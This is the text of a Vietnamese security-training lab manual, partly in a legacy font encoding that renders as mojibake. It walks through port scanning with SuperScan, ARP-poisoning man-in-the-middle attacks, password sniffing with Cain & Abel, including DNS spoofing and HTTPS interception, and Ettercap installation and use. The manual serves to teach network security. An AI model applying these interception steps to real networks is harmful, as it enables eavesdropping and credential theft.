Hướng dẫn thực tập Security

pdf 120 trang ngocly 1850
Download
Bạn đang xem 20 trang mẫu của tài liệu "Hướng dẫn thực tập Security", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên

Tài liệu đính kèm:

  • pdfhuong_dan_thuc_tap_security.pdf

Nội dung text: Hướng dẫn thực tập Security

  1. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN BAØI 1: DÒ TÌM THÔNG TIN HỆ THỐNG TRÊN MẠNG 1 – Muïc ñích: Trong baøi hoïc naøy chuùng ta seõ tieán haønh kieåm tra thoâng tin treân maïng baèng coâng cuï Super Scan.Cuï theå hôn, chuùng ta seõ duøng Super Scan ñeå queùt 1 IP vaø xaùc ñònh caùc loã hoång coù theå xaâm nhaäp vaøo hệ thống thông qua các port mà phần mềm xác định mở. 2 – Caùc coâng cuï caàn coù trong baøi lab: Super Scan Chuùng ta coù theå down tool Super Scan taïi www.foundstone.com 3 – Caùc böôùc tieán haønh: + Sau khi down Super Scan veà maùy, baïn chaïy chöông trình nhö hình döôùi + Hostname/IP: ñieàn vaøo IP muoán queùt + Hoaëc baïn cuõng coù theå Scan caû 1 range IP : - Start IP : IP baét ñaàu - End IP : IP ket thuùc Tài liệu hướng dẫn thực tập Security+- Trung tâm đào tạo an ninh mạng ATHENA 1
  2. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN +Ñeå baét ñaàu queùt ta click vaøo nuùt start ôû goùc traùi beân döôùi +Ngoøai ra Super Scan coøn coù caùc options khaùc nhö: - Host and Services Discovery:Duøng ñeå thay ñoåi soá port baïn muoán queùt cuûa IP ñoù hoaëc döïa treân danh saùch Port list coù saün - Scan Options:thay ñoåi caùc tham soá host vaø services - Tools: Caùc chöùc naêng ñeå kieåm tra,tìm kieám thoâng tin cuûa 1 IP hoaëc domain.(Ping,whois,HTTP Header request, v v ) - Windows Enumeration: Thoâng tin môû roäng veà IP hoaëc Domain (NetBIOS,Mac address, Workstation, v v.) ví dụ: Khi scan IP 210.245.31.17 ta seõ nhaän ñöôïc keát quaû nhö hình döôùi: ÔÛ ñaây, IP 210.245.31.17 ñang môû toång coäng 6 port: 5 TCP vaø 1 UDP Theo nhö lieät keâ thì caùc port TCP ñang môû laø: -21 : FTP -23 : Telnet Tài liệu hướng dẫn thực tập Security+- Trung tâm đào tạo an ninh mạng ATHENA 2
  3. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN -80 : web -443: SSL -8001: port naøy do Trojan môû Ñeå xem chi tieát keát quaû hôn, ta click vaøo View HTML Results. Töø ñaây ta seõ xaùc ñònh ñöôïc caùc port maø hacker coù theå lôïi duïng ñeå xaâm nhaäp vaø coù bieän phaùp secure cho caùc port naøy. Moät soá tính naêng khaùc cuûa Super Scan trong phaàn Tools ñeå ping, tracert hay whois 1 domain : ÔÛ hình treân ta thu ñöôïc thoâng tin khi tracert domain www.itsea.net nhö sau: Domain naøy coù IP :207.210.81.150 vaø qua 16 hop, server duøng heä ñieàu haønh Linux, chaïy Apache 1.3.36 (unix) ,OpenSSL 0.9.7a v v Tài liệu hướng dẫn thực tập Security+- Trung tâm đào tạo an ninh mạng ATHENA 3
  4. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ngoøai ra coøn 1 soá chöùc naêng khaùc ñeå khai thaùc trieät ñeå nhöõng hoâng tin veà domain naøy. 4 – Nhaän xeùt: Super Scan laø 1 coâng cuï scan kieåm tra thoâng tin IP raát maïnh vaø deã söû duïng, ngoøai ra coøn 1 soá coâng cuï khaùc nhö Scan port, 1st Blue scan port, v v vaø coù chöùc naêng gioáng Super Scan. Vôùi 1 coâng cuï nhö Super Scan thì ko khoù ñeå kieåm soùat nhöõng thoâng tin veà 1 IP vaø töø ñoù coù caùch baûo maät toát hôn. Tài liệu hướng dẫn thực tập Security+- Trung tâm đào tạo an ninh mạng ATHENA 4
  5. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN BÀI 2: CÁC PHƯƠNG PHÁP SNIFFER A. TOÅNG QUAN SNIFFER Sniffer ñöôïc hieåu ñôn giaûn nhö laø moät chöông trình coá gaéng nghe ngoùng caùc löu löôïng thoâng tin treân moät heä thoáng maïng Sniffer ñöôïc söû duïng nhö moät coâng cuï ñeå caùc nhaø quaûn trò maïng theo doõi vaø baûo trì heä thoáng maïng. Veà maët tieâu cöïc, sniffer ñöôïc söû duïng nhö moät coâng cuï vôùi muïc ñích nghe leùn caùc thoâng tin treân maïng ñeå laáy caùc thoâng tin quan troïng Sniffer döïa vaøo phöông thöùc taán coâng ARP ñeå baét goùi caùc thoâng tin ñöôïc truyeàn qua maïng. Tuy nhieân nhöõng giao dòch giöõa caùc heä thoáng maïng maùy tính thöôøng laø nhöõng döõ lieäu ôû daïng nhò phaân (binary). Bôûi vaäy ñeå hieåu ñöôïc nhöõng döõ lieäu ôû daïng nhò phaân naøy, caùc chöông trình Sniffer naøy phaûi coù tính naêng phaân tích caùc nghi thöùc (Protocol Analysis), cuõng nhö tính naêng giaûi maõ (Decode) caùc döõ lieäu ôû daïng nhò phaân ñeå hieåu ñöôïc chuùng Moät soá caùc öùng duïng cuûa Sniffer ñöôïc söû duïng nhö : dsniff, snort, cain, ettercap, sniffer pro B. HOAÏT ÑOÄNG CUÛA SNIFFER Sniffer hoaït ñoäng chuû yeáu döïa treân daïng taán coâng ARP. TAÁN COÂNG ARP POSIONING 1. Giôùi thieäu Ñaây laø moät daïng taán coâng raát nguy hieåm, goïi laø Man In The Middle. Trong tröôøng hôïp naøy gioáng nhö bò ñaët maùy nghe leùn, phieân laøm vieäc giöõa maùy Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 4
  6. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN gôûi vaø maùy nhaän vaãn dieãn ra bình thöôøng neân ngöôøi söû duïng khoâng heà hay bieát mình bò taán coâng 2. Sô Löôïc Quaù trình hoaït ñoäng Treân cuøng moät maïng, Host A vaø Host B muoán truyeàn tin cho nhau, caùc Packet seõ ñöôïc ñöa xuoáng taàng Datalink ñeå ñoùng goùi, caùc Host phaûi ñoùng goùi MAC nguoàn, MAC ñích vaøo Frame. Nhö vaäy tröôùc khi quaù trình truyeàn Döõ lieäu, caùc Host phaûi hoûi ñòa chæ MAC cuûa nhau. Neáu nhö Host A khôûi ñoäng quaù trình hoûi MAC tröôùc, noù seõ gôûi broadcast goùi tin ARP request cho taát caû caùc Host ñeå hoûi MAC Host B, luùc ñoù Host B ñaõ coù MAC cuûa Host A, sau ñoù Host B chæ traû lôøi cho Host A MAC cuûa Host B(ARP reply ). Coù 1 Host C lieân tuïc gôûi ARP reply cho Host A vaø Host B ñòa chæ MAC cuûa Host C, nhöng laïi ñaêt ñòa chæ IP laø Host A vaø Host B. Luùc naøy Host A cöù nghó maùy B coù MAC laø C. Nhö vaäy caùc goùi tin maø Host A gôûi cho Host B ñeàu bò ñöa ñeán Host C, goùi tin Host B traû lôøi cho Host A cuõng ñöa ñeán Host C. Neáu Host C baät chöùc naêng forwarding thì coi nhö Host A vaø Host B khoâng heà hay bieát raèng mình bò taán coâng ARP Host A Host B Host C . Ví duï : Ta coù moâ hình goàm caùc host Attacker : laø maùy hacker duøng ñeå taán coâng ARP Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 5
  7. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN IP : 10.0.0.11 MAC : 0000.0000.1011 Victim : laø maùy bò taán coâng IP : 10.0.0.12 MAC : 0000.0000.1012 HostA IP : 10.0.0.13 MAC : 0000.0000.1013 - Ñaàu tieân, HostA muoán gôûi döõ lieäu cho Victim, caàn phaûi bieát ñòa chæ MAC cuûa Victim ñeå lieân laïc. HostA seõ gôûi broadcast ARP Request tôùi taát caû caùc maùy trong cuøng maïng LAN ñeå hoûi xem IP 10.0.0.12 (IP cuûa Victim) coù ñòa chæ MAC laø bao nhieâu. - Attacker vaø Victim ñeàu nhaän ñöôïc goùi tin ARP Request, nhöng chæ coù Victim gôûi traû lôøi goùi tin ARP Reply laïi cho HostA. ARP Reply chöùa thoâng tin veà IP 10.0.0.12 vaø MAC 0000.0000.1012 cuûa Victim - HostA nhaän ñöôïc goùi ARP Realy töø Victim, bieát ñöôïc ñòa chæ MAC cuûa Victim laø 0000.0000.1012 seõ baét ñaàu thöïc hieän lieân laïc truyeàn döõ lieäu ñeán Victim. Attacker khoâng theå xem noäi dung döõ lieäu ñöôïc truyeàn giöõa HostA vaø Victim Maùy Attacker muoán thöïc hieän ARP attack ñoái vôùi maùy Victim. Attacker muoán moïi goùi tin HostA gôûi ñeán maùy Victim ñeàu coù theå chuïp laïi ñöôïc ñeå xem troäm - Attacker thöïc hieän gôûi lieân tuïc ARP Reply chöùa thoâng tin veà IP cuûa Victim 10.0.0.12, coøn ñòa chæ MAC laø cuûa Attacker 0000.0000.1011. - HostA nhaän ñöôïc ARP Reply nghó raèng IP Victim 10.0.0.12 coù ñòa chæ MAC laø 0000.0000.1011. HostA löu thoâng tin naøy vaøo baûng ARP Cache vaø thöïc hieän keát noái. - Luùc naøy moïi thoâng tin, döõ lieäu HostA gôûi tôùi maùy coù IP 10.0.0.12 (laø maùy Victim) seõ gôûi qua ñòa chæ MAC 0000.0000.1011 cuûa maùy Attacker. Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 6
  8. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN CAIN (Sử dụng phần mềm CAIN) Phần mềm Cain là phần mềm sniffer khá hiệu quả hiện nay. Các tinh năng của cain có thể cho phép sniffer được các thông tin “bí mật ” trong hệ thống mạng LAN như passowrd e-mail, password dịch vụ ftp,telnet, . 1.Yeâu caàu veà phaàn cöùng : - oå cöùng caàn troáng 10 Mb - heä ñieàu haønh Win 2000/2003/XP - caàn phaûi coù Winpcap 2. Caøi ñaët: Choïn Next. Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 7
  9. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Choïn Next. Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 8
  10. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Choïn Finish. Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 9
  11. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 10
  12. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN 3. Caáu hình Cain & Abel caàn caáu hình moät vaøi thoâng soá , moïïi thöù coù theå ñöôïc ñieàu chænh thoâng qua baûng Configuration dialog . Sniffer tab: Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 11
  13. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN -Taïi ñaây chuùng ta choïn card maïng söû duïng ñeå tieán haønh sniffer vaø tính naêng APR . Check vaøo oâ Option ñeå kích hoaït hay khoâng kích hoaït tính naêng. -Sniffer töông thích vôùi Winpcap version 2.3 hay cao hôn . Version naøy hoã trôï card maïng raát nhieàu . APR tab : Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 12
  14. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN -Ñaây laø nôi baïn coù theå config ARP . Maëc ñònh Cain ngaên caùch 1 chuoãi göûi goùi ARP töø naïn nhaân trong voøng 30 giaây . Ñaây thöïc söï laø ñieàu caàn thieát bôûi vì vieäc xaâm nhaäp vaøo thieát bò coù theå seõ gaây ra söï khoâng löu thoâng tính hieäu . Töø dialog naøy baïn coù theå xaùc ñònh thôøi gian giöõa moãi laàn thöïc thi ARP, xaùc ñònh thoâng soá ít seõ taïo cho ARP löu thoâng nhieàu ,ngöôïc laïi seõ khoù khaên hôn trong vieäc xaâm nhaäp . -Taïi muïc naøy, ta caàn chuù yù tôùi phaàn Spoofing Options: +Muïc ñaàu tieân cho pheùp ta söû duïng ñòa chæ MAC vaø IP thöïc cuûa maùy maø mình dang söû duïng. +Muïc thöù hai cho pheùp söû duïng moät IP vaø ñòa chæ MAC giaû maïo. (Löu yù ñòa chæ ta choïn phaûi khoâng truøng vôùi IP cuûa maùy khaùc) Khi click vaøo tab filters and ports, ta seõ thaáy moät soá thoâng tin veà giao thöùc vaø caùc con soá port töông öùng vôùi giao thöùc ñoù. Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 13
  15. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Fliter and Ports Tab : -Taïi ñaây baïn coù theå choïn kích hoaït hay khoâng kích hoaït caùc port öùng duïng TCP/UDP . HTTP fields tab : Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 14
  16. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Taïi ñaây coù 1 list danh saùch username vaø password söû duïng ñöôïc HTTP sniffer loïc laïi. - Taïi tab naøy cho pheùp ta bieát döôïc chöông trình naøy seõ baét 1 soá thoâng tin veà trang web nhö: + Muïc Username Fields: noù seõ laáy thoâng tin nhöõng gì lieân quan ñeán caùi teân (user name, account, web name v.v ) . + Muïc Password Fields: lanh vöïc naøy seõ ñaõm nhieäm vai troø laáy thoâng tin veà password (login password, user pass, webpass v.v ) 4. Caùc öùng duïng cuûa CAIN : + Baûo veä password manager : Tröôùc heát noù ñöôïc söû duïng nhö 1 private key baûo maät moät soá vaán ñeà cho user . Haàu heát thoâng tin trong Protected Storage ñöôïc maõ hoùa.Söû duïng nhö 1 key nhaän ñöôïc töø vieäc logon password cuûa user.Cho pheùp ñieàu hoøa vieâc truy caäp thoâng tin ñeå owner coù theå an toaøn truy xuaát . Moät vaøi öùng duïng cuûa Windows coù neùt ñaëc tröng neân söû duïng dòch vuï naøy : Internet Explorer , Oulook , Oulook Express Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 15
  17. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN + Giaûi maõ password manager : Noù cho pheùp baïn ñöa user names vaø passwords cho 1 taøi nguyeân maïng khaùc vaø 1 öùng duïng ,sau ñoù heä thoáng töï ñoäng cung caáp thoâng tin veà nhöõng söï vieáng thaêm thoâng tin maø baïn khoâng can thieäp. + LSA secrets dumper: LSA secrets thì söû duïng thoâng tin password cho accounts duøng ñeå start moät dòch vuï khaùc döõ lieäu cuïc boä. Dial Up vaø moät soá öùng duïng khaùc xaùc ñònh password naèm ôû ñaây . + Giaûi maõ password Dial-Up: Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 16
  18. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN +APR: APR laø neùt ñaëc tröng chính cuûa chöông trình .Noù cho pheùp laéng nghe veà caùc maïng chuyeån maïch vaø söï taán coâng löu thoâng IP giöõa caùc host . “APR poinsion routing” thöïc hieän : taán coâng vaø ñònh tuyeán chính xaùc ñòa chæ ñích APR taán coâng cô baûn thoâng qua thao taùc cuûa host ARP.Treân 1 ñòa chæ IP hay Ethernet khi maø 2 host muoán truyeàn tin laãn nhau thì phaûi bieát ñòa chæ MAC addresses cuûa nhau. Host goác thaáy baûng ARP neáu maø ôû ñaây coù 1 MAC addresses töông öùng vôùi ñòa chæ IP addresses cuûa noù. Neáu khoâng, noù laø ñòa chæ broadcasts ,moät lôøi yeâu caàu ARP hoûi ñòa chæ MAC cuûa ñòa chæ ñích. Bôûi vì goùi thoâng tin naøy ñöôïc göûi trong mieàn broadcasts, noù seõ ñi ñeán nhöõng caùi host cuøng subnet , tuy nhieân host vôùi IP address treân lyù thuyeát khi nhaän ñöôïc yeâu caàu seõ traû lôøi laïi ñòa chæ MAC goác cuûa noù. Traùi laïi neáu ARP-IP tieáp caän ñòa chæ ñích cuûa host thì noù saün saøng ñöa ra soure host treân ARP cache. Ñieàu naøy seõ ñöôïc duøng ñeå phaùt sinh löu thoâng ARP Config : Caàn chænh 1 vaøi thoâng soá, ñieàu naøy coù theå thöïc hieän ñöôïc baèng vieäc chæ roõ vieäc baét chöôùc MAC vaø IP addresses baèng vieäc söû duïng ARP poision packets . Ñieàu naøy thaät söï khoù khaên khi khoâng ñeå laïi veát tích cuûa vieäc taán coâng bôûi vì ngöôøi taán coâng thöïc teá khoâng bao giôø göûi ñòa chæ qua laïi treân maïng.Treân maïng ngöôøi taán coâng luùc naøo cuõng leùn luùc ôû giöõa ñeå quan saùt Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 17
  19. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Hình ôû treân laø ta muoán taán coâng ip töø 192.168.0.1 192.168.0.10 .Coâng vieäc tieán haønh theo cô cheá Ngöôøi ôû giöõa , chöông trình seõ thöïc hieän 1 söï taán coâng ARP poision , CAIN coù theå phaùt trieån söï taán coâng boä nhôù Cuûa nhieàu host trong khoaûng thôøi gian nhö nhau, baïn caàn choïn 1 ñòa chæ ôû oâ beân traùi Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 18
  20. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN + Service manager : ta coù theå start/stop ,pause/continued hay remove baát cöù 1 dòch vuï naøo coù treân cöûa soå giao dieän + Sniffer : Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 19
  21. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN ARP-DNS : Neùt ñaëc tröng ôû ñaây laø cho pheùp DNS tieán haønh giaû maïo thaønh 1 DNS-reply ñeå coù theå taán coâng . ARP-DNS deã daøng taïo ra 1 ip address treân DNS-reply .Sniffer deã daøng ruùt ra ñöôïc teân yeâu caàu töø goùi döõ lieäu keát hôïp vôùi vieäc thaáy ñöôïc ñòa chæ treân baûng danh saùch.ÔÛ ñaây goùi döõ lieäu seõ ñöôïc chænh laïi IP address ñeå sau ñoù re-route ñi .Luùc naøy client seõ bò ñaùnh löøa ñeå ta deã daøng bieát ñöôïc ñòa chæ ñích . ARP-HTTPS : ARP-HTTPS cho pheùp vieäc baét goùi vaø giaûi maõ trong söï löu thoâng cuûa HTTPS giöõa caùc host . Ñaây laø coâng vieäc keát hôïp vôùi coâng cuï Certificate Collector . Khi maø naïn nhaân Start HTTPS trình duyeät cuûa anh ta seõ hieän leân po-pup baùo ñoäng . Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 20
  22. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 21
  23. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN + Certificates Collector : Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 22
  24. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 23
  25. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập security+ tại trung tâm An Ninh Mạng ATHENA 24
  26. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN BÀI 3: ETTERCAP 1. Giôùi Thieäu Ettercap laø chöông trình phaân tích caùc goùi tin gôûi qua maïng, vì theá Ettercap cuõng laø moät phaàn meàm hieäu nghieäm cho pheùp ngöôøi söû duïng “ñaùnh hôi” caùc döõ lieäu treân maïng LAN, keå caû nhöõng thoâng tin ñaõ ñöôïc maõ hoùa. Ettercap coù theå giaû danh ñòa chæ MAC cuûa card maïng bò taán coâng, thay vì goùi tin ñöôïc truyeàn ñeán maùy tính caàn ñeán thì noù laïi ñöôïc truyeàn ñeán maùy tính coù caøi ettercap roài sau ñoù môùi truyeàn ñeán maùy tính ñích 2. Install treân Linux Tröôùc khi Install, chuùng ta caàn chuaån bò 3 goùi caøi sau: + ettercap-NG-0.7.1.tar – coù theå download töø website + libpcap-0.8.1.tar + libnet-1.1.2.1.tar – coù theå download töø website Install libnet: 1. # tar zxvf libnet-1.1.2.1.tar.gz 2. # cd libnet 3. # ./configure 4. # make 5. # make install Install libpcap: 6. # tar zxvf libpcap-1.1.2.1.tar.gz 7. # cd libpcap 8. # ./configure 9. # make 10. # make install Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 22
  27. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Install ettercap: 1. # tar zxvf ettercap-NG-0.7.1.tar.gz 2. # cd ettercap-NG-0.7.1 3. # ./configure 4. # make 5. # make install Quaù trình caøi ñaët hoaøn taát, treân cöûa soå console xuaát hieän nhöõng doøng thoâng baùo 3. Caáu Hình vaø Söû Duïng Ettercap - Môû giao dieän Ettercap baèng caùch goõ doøng leänh # ettercap –C Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 23
  28. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Tröôùc khi tieán haønh caáu hình, ta kieåm tra option Promisc mode coù döôïc check chöa, neáu chöa thì choïn check Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 24
  29. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Trong menu sniff, choïn Unified sniffing - Choïn card maïng söû duïng Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 25
  30. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Ñeå khôûi ñoäng quaù trình laéng nghe, choïn menu start, start sniffing Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 26
  31. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Taïi doøng User Messages se xuaát hieän thoâng baùo cho bieát dòch vuï ñang start leân - Trong menu Host, choïn Scan from hosts Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 27
  32. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 28
  33. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Trong menu Mitm, choïn Arp poisoning Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 29
  34. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 30
  35. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN - Khoâng choïn parameters, nhaán enter boû qua - Taïi doøng User messages xuaát hieän thoâng baùo - Ñeå xem caùc host ñaõ ñöôïc queùt, choïn Connections, trong menu View Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 31
  36. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Ñeå baét goùi, choïn host naøo ñang ôû cheá ñoä active, seõ hieän ra baûn caùc goùi baét ñöôïc, caùc goùi naøy seõ hieån thò döôùi daïng maõ hoùa Athena - Tài liệu hướng dẫn thực hành môn Security+. Lưu hành nội bộ 32
